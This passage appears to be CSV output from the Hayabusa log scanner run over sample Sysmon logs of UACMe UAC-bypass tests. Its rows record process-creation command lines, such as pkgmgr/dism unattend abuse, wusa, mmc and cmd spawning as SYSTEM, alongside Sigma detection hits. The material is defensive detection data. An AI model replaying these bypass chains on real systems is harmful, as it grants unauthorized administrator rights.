+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.900 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.820 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - 
Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.554 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 
36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx -2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx -2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 